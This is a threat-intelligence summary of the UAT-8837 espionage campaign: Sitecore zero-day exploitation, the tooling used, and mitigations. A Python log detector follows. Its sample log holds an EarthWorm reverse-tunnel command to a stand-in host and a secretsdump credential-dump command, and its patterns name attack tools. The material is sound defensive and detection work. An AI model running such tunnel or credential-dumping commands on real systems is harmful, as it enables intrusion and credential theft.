Full Report
A threat actor likely aligned with China has been observed targeting critical infrastructure sectors in North America since at least last year. Cisco Talos, which is tracking the activity under the name UAT-8837, assessed it to be a China-nexus advanced persistent threat (APT) actor with medium confidence based on tactical overlaps with other campaigns mounted by threat actors from the region.
Analysis Summary
# Threat Actor: UAT-8837
## Attribution & Identity
The threat actor is tracked by Cisco Talos under the name **UAT-8837**. It is assessed with medium confidence to be a **China-nexus Advanced Persistent Threat (APT) actor** based on tactical overlaps with other regional campaigns.
## Activity Summary
UAT-8837 has been observed operating since at least last year, primarily focused on obtaining initial access to high-value organizations. Most recently, the actor exploited a critical zero-day vulnerability in Sitecore (**CVE-2025-53690**, CVSS 9.0) to gain a foothold. Their activity shows tactical, tooling, and infrastructure similarities with a campaign detailed by Mandiant in September 2025, suggesting the actor may possess zero-day exploits. Upon gaining access, the actor focuses on reconnaissance, credential harvesting, and establishing persistence. In one observed instance, the actor exfiltrated DLL-based shared libraries, hinting at potential future supply chain compromise opportunities.
## Tactics, Techniques & Procedures
- **Initial Access:** Successful exploitation of vulnerable servers (e.g., Sitecore zero-day CVE-2025-53690) or using compromised credentials.
- **Post-Compromise Configuration:** Disabling **RestrictedAdmin** for Remote Desktop Protocol (RDP) to reduce credential exposure risks.
- **Hands-on-Keyboard Activity:** Running `cmd.exe` for local execution and reconnaissance.
- **Information Gathering:** Collecting domain, Active Directory (AD) information, security configurations, and credentials.
- **Establishing Persistence & Lateral Movement:** Deploying multiple open-source tools to create access channels and move within the network.
- **Specific Tools Deployed:**
  - **GoTokenTheft:** To steal access tokens.
  - **EarthWorm:** To create a reverse tunnel to attacker-controlled servers using SOCKS.
  - **DWAgent:** For persistent remote access and Active Directory reconnaissance.
  - **SharpHound:** To collect Active Directory information.
  - **Impacket:** Likely used to run commands with elevated privileges.
  - **GoExec:** A Golang-based tool to execute commands on connected remote endpoints.
  - **Rubeus:** A C# toolset for Kerberos interaction and abuse.
  - **Certipy:** For Active Directory discovery and abuse.
## Targeting
- **Sectors:** Critical Infrastructure sectors.
- **Geography:** North America.
- **Victims:** High-value organizations. (Note: Specific victim names are not provided in the text.)
## Tools & Infrastructure
- **Malware Families used:** Primarily relies on open-source tools rather than custom proprietary malware, including those listed above.
- **Infrastructure:** Attacker-controlled servers used as the far end of EarthWorm reverse tunnels. No C2 domains or IP addresses are given in the text; associated infrastructure details are inferred from overlaps with the campaigns detailed by Mandiant.
## Implications
UAT-8837 poses a significant threat to critical infrastructure, using sophisticated initial access techniques (including zero-days such as the Sitecore vulnerability) to conduct espionage. Their focus on harvesting credentials and AD information indicates an objective of establishing deep, persistent access. The exfiltration of product DLLs suggests a potential future vector focused on supply chain compromise, or on reverse engineering the libraries to identify product vulnerabilities.
## Mitigations
- **Patch Management:** Prioritize patching for known vulnerabilities, especially the exploited Sitecore zero-day (CVE-2025-53690).
- **Credential Monitoring:** Monitor for suspicious post-exploitation activity, particularly attempts to harvest credentials or disable RDP security controls like RestrictedAdmin.
- **Endpoint Detection & Response (EDR):** Implement robust detection for the execution of known open-source penetration testing tools (GoTokenTheft, SharpHound, Impacket, Rubeus, Certipy).
- **Network Monitoring:** Monitor for reverse tunnel creation indicative of EarthWorm usage.
- **Supply Chain Security:** Review processes related to vendor software libraries, particularly if product DLLs are handled or developed in-house, due to the observed exfiltration of such code.
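The detection items above (RestrictedAdmin tampering, execution of the named open-source tools, EarthWorm reverse tunnels) can be prototyped as a small log-matching pass. The following Python is an added example written for this page; it is not code from Cisco Talos or from the report. It runs over constructed, Sysmon-style `key=value|key=value` lines embedded in the block (the host names, users and log format are assumptions, not real telemetry). The registry value `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin` is the real Windows control for RestrictedAdmin mode; the tool-name patterns assume the tools run under their default names, and the EarthWorm pattern assumes its documented `-s rssocks` reverse-SOCKS client form.

```python
"""Toy detector for the post-compromise behaviours listed in the summary.

Input: constructed Sysmon-style log lines (NOT real telemetry).
Flags
  * writes to the RestrictedAdmin control value for RDP,
  * process launches of the open-source tools named in the report,
  * command lines that look like an EarthWorm reverse-SOCKS client.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    user: str
    evidence: str


# Real Windows value governing RestrictedAdmin mode for RDP:
# HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin
# (1 = RestrictedAdmin disabled, 0 = enabled). Any write to it is worth a look.
RESTRICTED_ADMIN_SUFFIX = r"\control\lsa\disablerestrictedadmin"

# Coarse name matches for the tools in the report (assumption: default names).
# The Impacket entry matches its well-known example script names and will also
# hit unrelated binaries such as Sysinternals PsExec, so treat it as a lead.
TOOL_PATTERNS = {
    "SharpHound": re.compile(r"sharphound", re.I),
    "Rubeus": re.compile(r"rubeus", re.I),
    "Certipy": re.compile(r"certipy", re.I),
    "GoTokenTheft": re.compile(r"gotokentheft", re.I),
    "Impacket": re.compile(r"(?:wmiexec|psexec|smbexec|atexec|secretsdump)(?:\.py)?", re.I),
    "GoExec": re.compile(r"\bgoexec\b", re.I),
    "DWAgent": re.compile(r"dwagent", re.I),
}

# EarthWorm reverse-SOCKS client is documented as "ew -s rssocks -d <host> -e <port>".
EARTHWORM_RE = re.compile(r"-s\s+rssocks\b", re.I)

# Constructed sample log (pipe-delimited key=value fields); not real data.
SAMPLE_LOG = r"""
event=ProcessCreate|host=WS01|user=CORP\alice|image=C:\Windows\System32\notepad.exe|cmdline=notepad.exe report.txt
event=RegistryValueSet|host=SRV-WEB01|user=NT AUTHORITY\SYSTEM|target=HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin|details=DWORD (0x00000001)
event=ProcessCreate|host=SRV-WEB01|user=CORP\svc_web|image=C:\Windows\Temp\SharpHound.exe|cmdline=SharpHound.exe -c All
event=ProcessCreate|host=SRV-WEB01|user=CORP\svc_web|image=C:\Windows\Temp\ew.exe|cmdline=ew.exe -s rssocks -d 203.0.113.10 -e 1080
event=ProcessCreate|host=WS02|user=CORP\bob|image=C:\Python\python.exe|cmdline=python.exe secretsdump.py corp/bob@10.0.0.5
"""


def parse_line(line: str) -> dict:
    """Split 'k=v|k=v' into a dict; fields without '=' are ignored."""
    fields = {}
    for part in line.strip().split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def detect_line(fields: dict) -> list:
    """Apply the three rules to one parsed event and return any findings."""
    findings = []
    host = fields.get("host", "?")
    user = fields.get("user", "?")
    event = fields.get("event", "")
    if event == "RegistryValueSet":
        target = fields.get("target", "")
        if target.lower().endswith(RESTRICTED_ADMIN_SUFFIX):
            evidence = f"{target} -> {fields.get('details', '')}"
            findings.append(Finding("restricted_admin_change", host, user, evidence))
    elif event == "ProcessCreate":
        text = fields.get("image", "") + " " + fields.get("cmdline", "")
        for name, pattern in TOOL_PATTERNS.items():
            if pattern.search(text):
                findings.append(Finding(f"known_tool:{name}", host, user, fields.get("cmdline", "")))
        if EARTHWORM_RE.search(text):
            findings.append(Finding("earthworm_reverse_tunnel", host, user, fields.get("cmdline", "")))
    return findings


def detect(log_text: str) -> list:
    """Run detect_line over every non-empty line of a log blob."""
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            findings.extend(detect_line(parse_line(line)))
    return findings


def hosts_by_finding_count(findings: list) -> Counter:
    """Hosts with several distinct hits deserve triage first."""
    return Counter(f.host for f in findings)


if __name__ == "__main__":
    results = detect(SAMPLE_LOG)
    for f in results:
        print(f"[{f.rule}] host={f.host} user={f.user} :: {f.evidence}")
    print("per-host counts:", dict(hosts_by_finding_count(results)))
```

On the constructed sample the registry write, the SharpHound launch and the EarthWorm client all land on the same host, which is the kind of stacking that should raise a single alert above the noise of any one coarse name match.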